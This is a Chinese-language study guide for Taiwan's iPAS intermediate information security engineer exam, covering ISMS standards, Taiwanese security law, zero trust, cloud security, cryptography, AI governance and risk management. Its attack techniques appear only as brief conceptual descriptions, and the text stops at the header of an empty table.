# iPAS 資訊安全工程師中級 考試重點整理 > **最後修改日期**:2026/04/03 > **📌 使用說明** > > 本筆記係參考 iPAS 資訊安全工程師中級考試大綱,並採用 114 年度考題回推整理。 > > **閱讀前提**: > - 中級考試假設初級內容已熟悉,基礎定義不重複整理,請參考 [初級筆記](https://hackmd.io/@hiiii/BJYND6jE-g) > - 中級範圍廣泛,建議至少研讀近三年考古題,而非僅看一年 > - 已有國際資安證照(如 CISSP、CEH、CISA)者,實務面會有基礎,但仍需補法規面 > > **備考策略**: > - 考古題不是背答案,而是透過題目找出自己不熟的領域,再針對性補強 > - 留意當年度的政府政策與資安趨勢,iPAS 命題會跟著走(例如:零信任、AI 安全、供應鏈安全) > - **防護實務**歷年通過率約三成,是兩科中較難的,建議多分配時間 > - 每年約有 20-30% 的新題型,無法靠背考古題完全覆蓋,觀念理解比硬記更重要 > > **收錄原則**: > - 常考、重要的觀念會整理成筆記 > - 冷門攻擊手法或單一年度出現的細節題,僅保留考題供參考,不另作筆記 > - 本筆記以 **70 分及格** 為目標編寫,非滿分導向 > > **參考資源**: > - [考試大綱(115 年度簡章)](https://www.ipas.org.tw/ISE) > - [歷年考題](https://ipd.nat.gov.tw/ipas/certification/ISE/learning-resources) > - [114-2 考試應試策略與考題解析](https://hackmd.io/@hiiii/HkDTn4aYbg) # 答題技巧速查 | 出題模式 | 判斷方法 | |:---------|:---------| | 出現「**僅/只/只要**」 | 通常是錯的(防護不完整,單一措施不夠) | | 出現「**完全/絕對/一定**」 | 通常太絕對,是錯的 | | 出現「**黑名單**」過濾 | 通常不夠,應採白名單 | | 出現「**前端驗證**」 | 不可靠,驗證必須在後端 | | 問「最不適切」 | 找範圍太窄、太極端、或搞錯類別的選項 | | 四選一有三個類似 | 答案通常是那個明顯不同類的 | > ⚠️ 以上為常見命題傾向,輔助判斷用,不可取代觀念理解。 --- [TOC] --- # 第一科:資訊安全規劃實務 --- ## 1.1 資訊安全管理系統建置實務與法規遵循 ### CIA 三要素 | 要素 | 定義 | 破壞情境範例 | 常見控制措施 | |:-----|:-----|:-------------|:-------------| | 機密性(C) | 資料不被未授權存取 | 帳號被盜、資料外洩 | MFA、加密(TLS)、存取控制、定期改密碼 | | 完整性(I) | 資料不被未授權修改 | SQL Injection 竄改、勒索軟體加密 | 雜湊驗證、數位簽章、輸入驗證 | | 可用性(A) | 資料或服務可被正常使用 | DDoS、系統當機 | 備援機制、負載平衡、備份 | ### ISO 27001:2022 架構 | 項目 | 內容 | |------|------| | 控制項數量 | 93 項(原 2013 版為 114 項) | | 四大主題 | 組織 37、人員 8、實體 14、技術 34 | | 屬性標籤 | 控制類型(預防/偵測/矯正)、資安特性(CIA)、網路安全概念(識別/保護/偵測/回應/復原) | **ISMS 溝通要素(ISO 27001 第 7.4 條)**:溝通事項、溝通對象、溝通方式、溝通時機 > 💡 ISO 27001 的條文每年會被隨機挑一個出來考(如溝通要素、管理審查輸入、風險評鑑流程等),不可能全部背起來。遇到沒見過的條文,用常識判斷+刪去法應對即可。 **ISO 27001 vs ISO 27002**: - 27001:要求標準(可驗證),規定「必須做什麼」 - 27002:指引標準(參考用),說明「如何做」 ### 資通安全管理法 **事件通報與復原時限**: | 事件等級 | 通報時限 | 損害控制/復原時限 | |----------|----------|-------------------| | 1、2 級(較輕) | 1 小時內 | 72 小時內 | | 3、4 級(較重) | 1 小時內 | 36 小時內 | **事件等級判斷邏輯**: | 判斷條件 | 等級 | |:---------|:-----| | 非核心業務受影響,可於可容忍中斷時間內復原 | 1、2 級(較輕) | | 核心業務受影響,或無法於可容忍中斷時間內復原 | 3、4 級(較重) | > 口訣:**核心 + 不可容忍 = 重大** **日誌保存期限**:至少 6 個月(等級「普」以上) **委外選任查核重點(資通安全管理法第 10 條)** | 查核項目 | 重點 | |:---------|:-----| | 人員資格 | 資安專業證照、資安訓練、類似業務經驗 | | 複委託 | 是否允許、範圍、對象、受託者資安維護措施 | | 國家機密 | 適任性查核、出境管制 | | 客製化開發 | 安全性檢測證明;核心系統或金額 ≥1000 萬須第三方檢測 | | 事件通報 | 違規或資安事件須立即通知委託機關 | | 契約終止 | 資料返還、移交、刪除或銷毀 | | 定期稽核 | 委託機關應定期確認執行情形 | ### 個人資料保護法 - 蒐集前須告知:機關名稱、蒐集目的、資料類別、利用期間/地區/對象/方式、當事人權利 - 不得要求當事人放棄法定權利(如申請複製本的權利) - 須採行適當安全措施防止個資被竊取、竄改、毀損、滅失或洩漏 ### 上市櫃公司資通安全管控指引 | 項目 | 要求 | |:-----|:-----| | 政策核定層級 | 副總級以上 | | 專責人員 | 須設置資安專責人員 | | 教育訓練 | 落實至每一位成員,並有稽核制度 | **重大資安事件揭露判斷**: - 媒體報導,可能影響投資人決策 - 核心系統/官網無法營運 - 個資/內部文件外洩之虞 - 財務損失可能影響投資決策 ### 其他重要法規 | 法規 | 適用對象 | 重點 | | :--- | :--- | :--- | | **GDPR** | 處理歐盟居民個資的組織 | 不限於歐盟境內公司 | | **HIPAA** | 醫療機構、保險業及相關業務夥伴 | 美國法案,保護「個人醫療健康資訊」(PHI) | | **PCI DSS** | 處理信用卡資訊的組織 | 持卡人資料保護 | | **ISO 27701** | 需個資保護管理的組織 | ISO 27001 延伸,隱私資訊管理(PIMS) | | **BS 10012** | 需個資保護管理的組織 | 英國標準,個人資訊管理 | --- > 📝 **本節相關題目共 14 題** → [前往題庫對應章節](https://hackmd.io/@hiiii/rk0t2YmaWe#11-資訊安全管理系統建置實務與法規遵循) ## 1.2 資安管理實務:存取控制、縱深防禦、職務區隔 (SOD) ### 存取控制模型 | 模型 | 特性 | 適用情境 | |------|------|----------| | DAC(自主式) | 資源擁有者決定權限 | 一般作業系統 | | MAC(強制式) | 系統依標籤強制控制 | 軍事、機密系統 | | RBAC(角色式) | 依角色指派權限 | 企業應用 | | ABAC(屬性式) | 依主體/環境/客體屬性動態決定 | 複雜環境、雲端 | **ABAC 屬性範例**:登入時間、地理位置、設備合規狀態、使用者部門 ### 認證因素 | 因素 | 類型 | 範例 | |:-----|:-----|:-----| | 知識因素 | 你知道什麼 | 密碼、PIN | | 持有因素 | 你擁有什麼 | 智慧卡、Token | | 生物因素 | 你是什麼 | 指紋、虹膜 | **MFA(多因子認證)**:結合兩種以上不同類型的認證因素 **Adaptive MFA(適應性多因子認證)**:根據風險評估(如登入地點、設備、行為)動態調整認證強度 **生物辨識指標**: - FAR(False Accept Rate):錯誤接受率 - FRR(False Reject Rate):錯誤拒絕率(Type-I Error) - CER(Crossover Error Rate):交叉錯誤率,FAR = FRR 的點 **FIDO2 / WebAuthn(防釣魚 MFA)**: - **原理**:使用實體金鑰(如 YubiKey)或裝置內建安全晶片,**簽章驗證取代傳統一次性密碼** - **抗釣魚特性**:金鑰只對「正確網域」回應,釣魚網站騙不到簽章 - **與 OTP 比較**: - OTP:用戶輸入 6 位數字 → 釣魚網站可中繼轉發 - FIDO2:金鑰直接驗證網域 → 釣魚網站拿不到憑證 > 💡 **Phishing-resistant MFA**:NIST SP 800-63 將 FIDO2 與基於 PKI 的智慧卡列為「抗釣魚等級」MFA;傳統簡訊 OTP / 推播驗證屬「非抗釣魚」。 ### 特權帳號管理(PAM) | 控制重點 | 說明 | |:-----|:-----| | 二次驗證 | 高權限帳號必須 MFA(類似銀行轉帳要簡訊驗證碼) | | 行為稽核 | 操作全程留痕,影像錄影或指令日誌 | | 提權核准 | 申請工單 + 主管核可才能取得權限 | | Just-in-Time(JIT) | 即時授予、用完即收回(類似超商兌換券,過期失效) | | 職務區隔(SOD) | 申請者 ≠ 核可者,避免一人獨大 | > 💡 **JIT 即時存取**:傳統 PAM 是「帳號常開但稽核」,JIT 是「平常無權限,需要時才暫時開」 — 攻擊者就算偷到帳號也無法常駐使用。 > 📌 **與 IGA 區別**:PAM 管「特權帳號的使用過程」,IGA 管「一般帳號的整個生命週期」(申請、變動、離職)。 ### 縱深防禦(Defense in Depth) 又稱「分層式安全性」,多層次保護,**不依賴單一產品或防線**: 1. 實體安全 2. 網路區隔 3. 主機強化 4. 應用程式防護 5. 資料加密 ### 職務區隔(SOD) 確保以下由不同人員擔任: - 申請與核准 - 開發與維運 - 執行與稽核 **有助於 SOD 的措施**:職務輪調、RBAC、定期權限審查 **小型組織無法完全實施時的補償措施**: - 活動監視 - 稽核存底 - 管理監督 --- > 📝 **本節相關題目共 5 題** → [前往題庫對應章節](https://hackmd.io/@hiiii/rk0t2YmaWe#12-資安管理實務存取控制縱深防禦職務區隔-sod) ## 1.3 安全架構規劃實務 ### 零信任架構(ZTA) **核心原則**:永不信任,持續驗證 > ⚠️ ZTA 目前仍在推廣階段,尚未廣為採用 **NIST SP 800-207 核心假設**: - 內部網路不可視為隱式信任區 - 內部設備可能非企業所有或管控 - 任何網路連線(含遠距)皆不可完全信任 - 跨環境移動時須維持一致安全標準 **核心元件**: - PEP(Policy Enforcement Point):政策執行點 - PDP(Policy Decision Point):政策決策點 **ZTA 信任評等考量因素**: - 資產狀態(設備合規、健康狀態) - 資源內容(存取的資源類型與敏感度) - 環境因素(時間、地點、網路位置) **CISA ZTA 五大支柱**: | 支柱 | 說明 | 控制範例 | |:-----|:-----|:---------| | Identity(身分) | 身分驗證與管理 | MFA、IAM | | Devices(設備) | 設備信任與合規 | 設備辨識、MDM | | Networks(網路) | 網路存取控制 | 微隔離、RDP 白名單 | | Applications & Workloads(應用程式) | 應用程式安全 | API 安全、容器安全 | | Data(資料) | 資料保護 | DLP、加密 | **橫向能力**: - Visibility and Analytics(可視性與分析) - Automation and Orchestration(自動化與編排) - Governance(治理) **ZTA 成熟度模型(CISA)**: | 階段 | 特性 | |:-----|:-----| | 傳統 | 邊界防護為主 | | 起始 | 開始導入零信任概念 | | 進階 | 部分自動化、融入動態指標 | | 最佳化 | 自動化政策執行、即時偵測回應 | > 金管會《金融業導入零信任架構參考指引》(2024)參考 CISA 模型,分為四級(Level I-IV) --- **ZTNA(Zero Trust Network Access,零信任網路存取)** ZTA 是整體架構,**ZTNA 是其中最常被部署的具體技術**,常被定位為 VPN 的下一代。 | 維度 | 傳統 VPN | ZTNA | |:-----|:-----|:-----| | 連線範圍 | 接通整個內網 | 只開放需要的應用 | | 信任模式 | 一旦驗證即信任 | 每次連線都重新驗證 | | 可見性 | 用戶看到所有內網資源 | 用戶只看到被授權的應用(其他應用不可見) | | 適用情境 | 員工辦公連線 | 遠距 / BYOD / 第三方廠商存取 | > 📌 **記憶法**:VPN 像進「公司大樓」(全部能走),ZTNA 像進「會議室」(只能進指定那一間)。 --- **微切分(Micro-segmentation)— 阻斷橫向移動的關鍵** CISA 五大支柱中「Networks」的核心技術。 - **目的**:就算攻擊者攻入內網,也無法在內網橫向擴散到其他系統 - **作法**:依工作負載(workload)動態套用安全群組,**預設拒絕(Default-deny)** 任何非政策允許的東西流量 - **與傳統 VLAN 區別**: - VLAN:粗粒度切分(部門級) - 微切分:細粒度切分(伺服器對伺服器、容器對容器) > 💡 **為什麼重要**:勒索軟體一旦進入內網,**會橫向掃整個網段**找伺服器加密。微切分讓它「進到一台就被框住」,破壞範圍最小化。 ### NIST CSF 2.0 六大功能: 1. **Govern(治理)**:高層責任、資安納入整體風險管理 2. Identify(識別) 3. Protect(保護) 4. Detect(偵測) 5. Respond(回應) 6. Recover(復原) ### 供應鏈安全 **SBOM(軟體物料清單)**: - 用途:管理第三方套件漏洞 - 常見格式:SPDX、CycloneDX **VEX(Vulnerability Exploitability eXchange,漏洞利用交換)**: - **問題**:SBOM 列出所有第三方元件,但**很多元件雖有漏洞,實際上不會被利用**(因為呼叫路徑沒到那裡) - **VEX 的作用**:標註「這個漏洞在我的軟體裡 **可利用 / 不可利用 / 未受影響**」 - **配套使用**:SBOM 列出元件清單 + VEX 標註可利用性 → 過濾掉假警報,聚焦真風險 > 💡 **生活比喻**:Log4j 大爆發時,所有用 Log4j 的軟體都被警告。但實務上有些只是包進去沒呼叫,根本不會被利用 — VEX 就是讓開發者把這些「假警報」標掉,讓資安團隊聚焦真正要修的。 **委外管理重點**: - 合約明定資安要求 - 事件通報鏈 - 資料返還/刪除/銷毀 - 受託者資安能力審查 **遠端存取安全措施**: | 措施 | 說明 | |:-----|:-----| | MFA | 多重身份驗證 | | VPN | 加密通道存取控制 | | DLP | 防止資料外洩(但無法單獨完成個資保護) | | 傳輸加密 | 保護營業秘密 | ### VDI(虛擬桌面基礎架構) | 項目 | 說明 | |:-----|:-----| | 定義 | 桌面環境集中部署於資料中心,端點僅顯示畫面 | | 核心優勢 | 資料不落地、集中控管、適合遠端辦公 | | 搭配方案 | 精簡用戶端(Thin Client)+ VDI | | 與 VPN 差異 | VPN 加密通道但資料仍在端點;VDI 資料完全不在端點 | ### OT/ICS 安全 **相關標準**:ISO/IEC 62443、NIST SP 800-82 **IT/OT 環境設計原則**: | 原則 | 說明 | |:-----|:-----| | 網路區隔 | IT 環境與 OT 環境必須區隔 | | 獨立基礎設施 | 不共用目錄服務、檔案伺服器 | | 持續更新 | OT 環境仍須更新修補弱點 | **OT 環境導入 ZTA 的挑戰**: - 老舊 ICS 設備不支援現代化身分驗證協定(如 MFA、SAML) - 設備生命週期長(10-20 年),難以汰換 ### 雲端安全責任分配 | 模式 | 客戶負責 | 雲端商負責 | |------|----------|------------| | IaaS | OS(含 Patch)以上全部 | 硬體、虛擬化 | | PaaS | 應用程式、資料 | OS、中介軟體 | | SaaS | 資料、帳號設定 | 所有技術層 | **雲端安全常見威脅(CSA Top Threats)** | 威脅 | 對應控制方向 | |:-----|:-------------| | 配置錯誤與變更控制不足 | 組態管理、變更管理 | | 身分與存取管理(IAM)問題 | 最小權限、MFA | | 不安全的介面與 API | API 安全、輸入驗證 | | 雲端安全策略缺失 | 制定雲端安全政策 | | 不安全的第三方資源 | 供應鏈管理、SBOM | | 不安全的軟體開發 | SDLC、安全編碼 | | 意外的雲端資料洩露 | DLP、加密、存取控制 | | 系統漏洞 | 弱點掃描、修補管理 | | 雲可見性/可觀測性不足 | 日誌、監控、SIEM | | 未驗證的資源共享 | 存取控制、隔離 | | APT | 縱深防禦、威脅偵測 | **雲端安全工具** **CNAPP(Cloud-Native Application Protection Platform)**:雲原生應用程式保護平台,整合多種雲端安全功能 | 工具 | 全稱 | 功能 | |:-----|:-----|:-----| | CSPM | Cloud Security Posture Management | 雲端安全態勢管理,檢查雲端配置是否符合安全基準 | | CWPP | Cloud Workload Protection Platform | 雲端工作負載保護,保護 VM、容器、無伺服器 | | CIEM | Cloud Infrastructure Entitlement Management | 雲端授權管理,管理雲端身分與權限 | > CNAPP = CSPM + CWPP + CIEM 的整合平台 ### 常見加密技術整理 **加密類型比較**: | 類型 | 代表演算法 | 特性 | 用途 | |:-----|:-----------|:-----|:-----| | 對稱式加密 | AES-128/256 | 加解密同一把金鑰、速度快 | 資料加密、磁碟加密(BitLocker) | | 非對稱式加密 | RSA、ECC | 公私鑰配對、速度慢 | 數位簽章、金鑰交換 | | 雜湊函數 | SHA-256、SHA-3 | 不可逆、固定長度輸出 | 完整性驗證、密碼儲存 | **密碼儲存安全性**: | 做法 | 安全性 | 說明 | |:-----|:-------|:-----| | 明文儲存 | ✗ 極危險 | 資料庫外洩即全部曝光 | | 僅雜湊 | △ 不足 | 可被彩虹表攻擊 | | 加鹽雜湊(如 SHA-256 + Salt) | ✓ 安全 | 每筆密碼加上隨機鹽值,防彩虹表 | **TLS 握手簡要流程**: 1. 客戶端發送支援的加密套件清單 2. 伺服器回傳選定的套件 + 數位憑證 3. 客戶端驗證憑證(CA 簽發、有效期、網域) 4. 雙方協商產生對稱式會話金鑰 5. 後續通訊以對稱式加密傳輸 **相關安全機制**: | 機制 | 說明 | |:-----|:-----| | HSTS | 強制瀏覽器使用 HTTPS,防止降級攻擊 | | 憑證釘選(Certificate Pinning) | 綁定特定憑證,防止中間人攻擊 | | TEE(Trusted Execution Environment) | 獨立安全硬體環境,保護金鑰生成與加密操作(如 ARM TrustZone) | | BitLocker | Windows 全磁碟加密,筆電遺失時保護資料 | ### 後量子密碼學(PQC) **定義**:利用現有傳統電腦(CPU、記憶體)即可運行,能抵禦量子電腦攻擊的加密演算法 **量子運算對密碼學的影響**: | 類型 | 影響 | 原因 | |:-----|:-----|:-----| | 對稱式加密 | 安全性減半 | Grover 演算法(AES-256 → 等效 AES-128) | | 非對稱式加密 | 可被破解 | Shor 演算法(RSA、ECC 皆受影響) | **威脅**:「先擷取後解密(Harvest Now, Decrypt Later)」— 攻擊者現在蒐集加密資料,等量子電腦成熟後解密 **應對策略**: - 混合加密模式:同時使用傳統演算法 + PQC 演算法 - 採用標準化 PQC 演算法(如 NIST 標準化的) **注意事項**: - 避免使用未經驗證的「專有」抗量子演算法 - 長期保密資料(如專利、設計圖)應優先評估 ### AI 安全與治理 **ISO 42001**:人工智慧管理系統(AIMS),用於組織 AI 治理與風險管理 **AI 治理合規標準對照** 近年 AI 入考的合規標準逐漸成體系,常考辨識「哪個適用 / 不適用」: | 標準 | 性質 | 適用 | |:-----|:-----|:-----| | **ISO 42001(AIMS)** | 管理系統(可驗證) | 組織建立 AI 治理制度 | | **NIST AI RMF** | 風險管理框架(指導性) | 識別、評估、管理 AI 風險 | | **EU AI Act** | 法令(強制適用) | 在歐盟營運的 AI 系統合規 | | **公部門 AI 應用參考手冊** | 台灣公部門指引 | 政府機關 AI 應用 | | ❌ ISO 27006 | 認證機構規範 | **與 AI 治理無關**(常見干擾項) | > 📌 **EU AI Act 風險分級**:把 AI 系統依風險分四級 — 不可接受(禁止)/ 高風險(嚴格管制)/ 有限風險(揭露義務)/ 最小風險(自由)。台灣 AI 公司若有歐盟客戶,必須符合此分級要求。 **LLM/生成式 AI 安全** OWASP Top 10 for LLM(2025): | 排名 | 風險 | |:-----|:-----| | LLM01 | Prompt Injection(提示注入) | | LLM02 | Sensitive Information Disclosure(敏感資訊洩露) | | LLM03 | Supply Chain(供應鏈風險) | | LLM04 | Data and Model Poisoning(資料與模型污染) | | LLM05 | Improper Output Handling(不當輸出處理) | | LLM06 | Excessive Agency(過度授權) | | LLM07 | System Prompt Leakage(系統提示洩露) | | LLM08 | Vector and Embedding Weaknesses(向量與嵌入弱點) | | LLM09 | Misinformation(錯誤資訊) | | LLM10 | Unbounded Consumption(無限制資源消耗) | **企業使用 LLM 控制措施**: - 清查並限制非核可的 LLM 服務 - WAF 限制程式片段上傳 - 雲端 API 連結確認與管理 - DLP 防止敏感資訊外洩 - RBAC 限制可存取的知識庫 - Prompt 過濾(防 Prompt Injection) --- > **Q:** 【題組 2】情境如附圖所示。在導入影像辨識、聲音辨識或 AI 模組,為了確保導入系統的可信任性(Trustworthiness),應考量下列哪些項目?(複選) > > **情境**:近年來,人工智慧的應用有效的協助企業組織完成許多艱難的任務,節省大量的人力。然而,結合深度偽造技術(Deepfake)的語音與影像攻擊,使詐騙效果更高。攻擊者可精準模仿組織高層的聲音或影像,誘使受害者放下警戒、依指示行動,導致重大資安風險與營運損失。企業高層要求身為資安長的您規劃一系列的強化機制,以避免組織同仁受騙將公司的款項匯出造成組織的營運損失。 > > 資安部門據此推動以下控制措施: > (1) 阻擋存取深度偽造工具或相關不良內容網站的使用。 > (2) 企業導入影像辨識、聲音辨識或 AI 模組,增加深度偽造攻擊的防禦能力。 > (3) 教育員工辨識深度偽造攻擊(如假冒上司語音指令、影像假訊息等)。 > (4) 財務與會計系統導入多因子認證(Multi-Factor Authentication, MFA),以降低匯款人員身份遭到盜用。 > (5) 電子郵件系統強化安全性,導入電子郵件系統的資料儲存加密技術。 > (6) 加強職務區隔(Segregation of Duties, SoD):超過一定金額的匯款額度需要經過主管複核同意後始得匯款。 > (7) 採用專有視訊會議系統導入多因子認證,封鎖非公司認可的專有視訊會議系統開會。 > > - \(A\) AI 強韌度(AI Robustness) > - \(B\) AI 可靠度(AI Reliability) > - \(C\) AI 可控性(AI Controllability) > - \(D\) AI 系統速度(AI System Speed) <details> <summary>查看答案</summary> **\(A\)\(B\)\(C\)** 這題的正確答案是 \(A\)、\(B\)、\(C\)。 在 AI 治理與資訊安全框架(如 NIST AI RMF、ISO/IEC 22989:2022)中,可信任性 \(Trustworthiness\) 指的是 AI 系統在面對各種狀況時,能夠表現出準確、安全且符合預期的能力。 **正確選項解析** - **\(A\) AI 強韌度 \(AI Robustness\)**:AI 系統在面對錯誤輸入、異常環境或 **惡意攻擊(Adversarial Attacks)** 時,仍能維持運作且不被輕易誤導的能力。在防禦 Deepfake 的情境中,攻擊者可能在圖片中加入人眼看不見的雜訊來欺騙 AI 偵測模型,如果 AI 不夠強韌,防禦系統形同虛設。 - **\(B\) AI 可靠度 \(AI Reliability\)**:系統在規定的條件與時間內,能持續且穩定地執行預期功能的能力。偵測系統不能「時靈時不靈」,如果 AI 今天能抓到 Deepfake、明天卻漏報,使用者就無法信任該系統的判斷結果。依據 NIST AI 100-1:有效性、準確性、穩健性和可靠性的測量有助於提高系統的可信度。 - **\(C\) AI 可控性 \(AI Controllability\)**:人類能夠監控、干預或在必要時強制停止 AI 系統的能力(Human-in-the-loop)。如果 AI 模組發生誤判(例如把總經理的真實視訊當成 Deepfake 封鎖),管理人員必須有能力介入並覆寫 AI 的決定。 **錯誤選項解析** - **\(D\) AI 系統速度 \(AI System Speed\)**:速度屬於「效能 \(Performance/Efficiency\)」指標,而非「可信任性」指標。一個運算極快的 AI 系統,如果結果是錯的(不可靠)或容易被駭客騙過(不強韌),它仍然是不可信任的。 > 📖 **參考框架**:ISO/IEC 22989:2022 將 AI Trustworthiness 的特性列為:Robustness、Reliability、Resilience、Controllability、Explainability、Predictability、Transparency、Bias and Fairness 等,不包含 Speed。 </details> --- > 📝 **本節相關題目共 31 題** → [前往題庫對應章節](https://hackmd.io/@hiiii/rk0t2YmaWe#13-安全架構規劃實務) ## 2.1 風險分析與評估 ### 風險管理流程 ``` 建立全景 → 風險識別 → 風險分析 → 風險評估 → 風險處理 └─────── 風險評鑑 ───────┘ ``` ### 建立全景 定義範疇與邊界,考量因素: - 組織架構、營運目標、策略及政策 - 適用之法令、法規及契約要求 - 組織整體風險管理作法 - 組織內資訊及資通系統資產及相對應之控制措施 **常見外部合規要求**: | 來源 | 說明 | 範例 | |:-----|:-----|:-----| | 法律(Law) | 國家立法 | 個資法、刑法 | | 法規(Regulation) | 主管機關規定 | 銀行法、資通安全管理法 | | 行業規範 | 產業自律標準 | PCI DSS、銀行公會規範 | | 合約(Contract) | 與第三方約定 | 供應商合約、SLA | ### 風險評鑑三步驟 | 步驟 | 說明 | |:-----|:-----| | 風險識別 | 找出所有風險來源(含不可控制的),可能有多個來源與後果 | | 風險分析 | 評估事件發生的可能性與影響程度 | | 風險評估 | 將分析結果與風險準則比較,決定是否需採取控制措施 | **風險識別項目**: - 資產 - 威脅(含威脅行為者) - 弱點 - 現有控制措施 **威脅行為者(Threat Actors)**: | 類型 | 動機 | 目標 | 威脅程度 | 範例 | |:-----|:-----|:-----|:---------|:-----| | APT / 國家級駭客 | 間諜、癱瘓、情蒐 | 關鍵基礎設施、政府、國防 | 最高 | Volt Typhoon 攻擊美國基礎設施、Sandworm 攻擊烏克蘭電網 | | 駭客行動主義者(Hacktivist) | 政治訴求 | 特定組織、政府網站 | 中 | Anonymous 攻擊政府網站、網頁塗鴉(Defacement) | | 網路罪犯 | 金錢利益 | 個資、金融資料 | 中高 | 勒索軟體集團(如 LockBit)、暗網販售個資 | | 白帽駭客 | 獎金、榮譽 | 漏洞回報 | 無害 | Bug Bounty 漏洞獎勵計畫 | | 內部威脅(蓄意) | 報復、利益 | 內部資料 | 中高 | 離職前複製客戶資料、植入後門 | | 內部威脅(非蓄意) | 無(疏失、粗心) | 非特定 | 中 | 轉帳多打一個零、覆蓋錯誤檔案、誤寄郵件 | > 💡 **弱點 vs 威脅的判斷**:「組織缺了什麼」是弱點(如缺乏教育訓練),「人做了什麼」是威脅事件(如員工誤點釣魚郵件)。同一件事換個描述方式就會換類別,看題目主詞判斷。 **常見弱點分類**: | 類型 | 範例 | 考題常見描述 | |:-----|:-----|:-------------| | 人員弱點 | 缺乏資安意識訓練、未落實職務區隔 | 「員工未受過社交工程訓練」 | | 軟體弱點 | 未修補漏洞、輸入驗證不當、設定錯誤 | 「系統存在 SQL Injection 漏洞」 | | 硬體弱點 | 設備 EOS/EOL、韌體未更新 | 「防火牆已遭原廠宣告終止服務」 | | 網路弱點 | 開放不必要 Port、未加密傳輸、未區隔 IT/OT | 「內部網路未實施微隔離」 | | 流程弱點 | 無變更管理程序、無備份驗證機制 | 「系統更新後未經測試即上線」 | | 實體弱點 | 機房無門禁、無監控 | 「機房未設置環境監控系統」 | > 💡 **同一個人可以同時是弱點和威脅**: > > | 描述 | 分類 | 為什麼 | > |:-----|:-----|:-------| > | 這個員工沒受過社交工程訓練 | 弱點 | 缺陷在那裡,還沒出事 | > | 這個員工點了釣魚郵件 | 威脅事件 | 動了手,事情發生了 | > > 判斷關鍵:**出事了沒有?** 沒出事是弱點,出事了是威脅事件。 > 💡 **弱點 vs 威脅的判斷**:「組織缺了什麼」是弱點(如缺乏教育訓練),「人做了什麼」是威脅事件(如員工誤點釣魚郵件)。同一件事換個描述方式就會換類別,看題目主詞判斷。 >**APT(Advanced Persistent Threat)**:有組織、長期潛伏、針對特定目標的進階攻擊 **風險分析 - 定量分析公式**: | 名詞 | 定義 | 公式 | |:-----|:-----|:-----| | AV | 資產價值 | — | | EF | 曝險因子(損失百分比) | — | | SLE | 單次損失期望值 | AV × EF | | ARO | 年化發生率 | — | | ALE | 年化損失期望值 | SLE × ARO | ### 風險評鑑時機 - 至少每年定期執行 - 營運重大改變時 - 風險處理後(評估殘餘風險) - 執行前應先了解背景資訊(法規、技術環境等) --- > 📝 **本節相關題目共 8 題** → [前往題庫對應章節](https://hackmd.io/@hiiii/rk0t2YmaWe#21-風險分析與評估) ## 2.2 風險處理實務 ### 風險處理四選項 | 選項 | ISO 術語 | 說明 | 範例 | |:-----|:---------|:-----|:-----| | 降低 | Modification | 實施控制措施降低風險 | 導入 PSDLC、安裝防火牆 | | 轉移 | Sharing | 移轉給第三方 | 購買保險、委外 | | 避免 | Avoidance | 移除風險來源 | 停止高風險業務 | | 接受 | Retention | 承受風險 | 記錄並監控 | **選擇風險處理選項的考量因素**: - 組織的目標 - 組織所訂之風險準則 - 可用資源(人力、預算、時間) - 成本效益 **風險處理原則**: - 風險處理選項可組合使用,非相互排斥 - 高風險優先處理,依風險等級排定優先順序 - 導入新控制措施可能產生新風險,需一併管理 **風險處理計畫應包含**: - 如何實施選定之風險處理選項 - 風險處理實施之順序(優先序) - 風險當責者 - 核准與實施人員 **風險擁有者**:負責核准風險處理選項與計畫 **殘餘風險**:處理後剩餘的風險,須經風險擁有者核可,並文件化、定期審查 **資安保險(Cyber Insurance)— 風險轉移實務** 「轉移」選項的最常見實作。考題常問「保險屬於哪一種風險處理」(答:轉移)。 **保險可以涵蓋的損失**: - 資料外洩通報成本(GDPR 通知 / 受影響當事人賠償) - 業務中斷損失(勒索軟體導致無法營業) - 訴訟法律費用 - 數位鑑識調查費 **保險「不能」涵蓋的(常考反面題)**: - ❌ 系統可用性問題(供電中斷、ISP 故障)— 保險不解決基礎設施 - ❌ 預先存在的弱點未修補(投保前已知漏洞) - ❌ 故意造成的損失(內部蓄意人員) > 📌 **題目陷阱**:有題目問「供電風險的最佳措施」,選項裡有「資安保險」— 這是**錯**的,因為保險解決事後賠償,不解決供電可用性。可用性問題要靠 UPS / 雙電源 / 備援站點。 ### 控制措施類型 **依功能**: | 類型 | 英文 | 目的 | 範例 | |:-----|:-----|:-----|:-----| | 預防性 | Preventive | 事前阻止 | 防火牆、存取控制、加密、教育訓練 | | 偵測性 | Detective | 事中發現 | IDS、日誌審核、CCTV | | 矯正性 | Corrective | 事後復原 | 備份還原、修補程式 | | 補償性 | Compensating | 替代控制 | 當主控制無法實施時 | **依實施方式**: | 類型 | 英文 | 範例 | |:-----|:-----|:-----| | 管理性 | Administrative | 政策、程序、教育訓練、背景查核 | | 技術性 | Technical | 防火牆、加密、IDS、存取控制 | | 實體性 | Physical | 門禁、CCTV、警衛、機房環控 | --- > 📝 **本節相關題目共 14 題** → [前往題庫對應章節](https://hackmd.io/@hiiii/rk0t2YmaWe#22-風險處理實務) # 第二科:資訊安全防護實務 ## 3.1 弱點、威脅分類與攻擊手法 ### 弱點分類 | 類型 | 說明 | 範例 | |:-----|:-----|:-----| | 軟體弱點 | 存在於程式碼中 | 邏輯錯誤、輸入驗證不當、設定錯誤 | | 硬體弱點 | 存在於硬體/韌體中 | 記憶體處理不當、Spectre/Meltdown | | 網路弱點 | 網路設計/配置問題 | 開放不必要 Port、未加密傳輸 | | 零日弱點 | 廠商尚未提供修補的漏洞 | 攻擊者先於廠商發現並利用 | ### 常見資安工具 | 工具 | 用途 | |:-----|:-----| | Nmap | 網路掃描、Port 掃描、服務識別 | | Nessus | 系統弱點掃描 | | Fortify | SAST(靜態原始碼分析) | | Hashcat | 密碼雜湊破解 | | John the Ripper | 密碼破解 | | Mimikatz | 提取 Windows 憑證、Kerberos 票據、NTLM 雜湊 | | Metasploit | 滲透測試框架、Exploit 利用 | | Burp Suite | Web 應用程式測試 | | Wireshark | 封包擷取與分析 | | SQLmap | SQL Injection 自動化測試 | | Nikto | Web 伺服器弱點掃描 | ### AD 網域攻擊 | 攻擊手法 | 原理 | |:---------|:-----| | Golden Ticket | 取得 KRBTGT 雜湊偽造票據,取得網域長期控制權 | | Kerberoasting | 針對有 SPN 的帳號,抓票據做離線破解 | | Pass-the-Ticket | 竊取既有 TGT/TGS 票據直接冒用 | | Pass-the-Hash | 使用 NTLM 雜湊直接認證,不需明文密碼 | ### Linux 提權偵察常見指令 | 指令 | 用途 | 攻擊者目的 | 